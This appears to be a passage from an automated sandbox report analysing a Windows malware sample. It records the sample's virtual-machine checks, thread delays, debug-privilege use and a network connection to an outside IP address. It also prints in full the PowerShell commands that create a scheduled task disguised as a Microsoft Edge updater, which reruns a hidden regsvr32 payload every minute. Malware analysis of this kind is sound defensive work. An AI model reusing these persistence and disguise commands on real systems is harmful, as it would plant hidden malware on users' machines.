Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 31000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30891	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30781	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30671	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30562	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30453	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30343	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30234	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30125	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 30016	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000009.00000002.3361578425.0000000003189000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnR*
Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000009.00000002.3361578425.0000000003189000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: regsvr32.exe, 00000009.00000002.3364511246.000000001BD7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: regsvr32.exe, 00000009.00000002.3364511246.000000001BD7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB
Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_2_00007FFD34520060 rdtsc

9_2_00007FFD34520060

Source: C:\Windows\System32\regsvr32.exe

9_2_00007FFDA338B900

Source: C:\Windows\System32\regsvr32.exe

9_2_00007FFDA338A040

Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\regsvr32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 144.202.34.112 56001

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\regsvr32.exe

Thread register set: 796 5

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\netapi32_1.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{d26aedb2-54a1-4069-8cfb-595ffa7ee9ca}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\netapi32_1.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{d26aedb2-54a1-4069-8cfb-595ffa7ee9ca}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"			Jump to behavior

Source: regsvr32.exe, 00000009.00000002.3362190126.0000000003935000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.3362190126.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000009.00000002.3362190126.0000000003935000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.3362190126.00000000038C3000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.3362190126.00000000034A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: regsvr32.exe, 00000009.00000002.3362190126.0000000003935000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
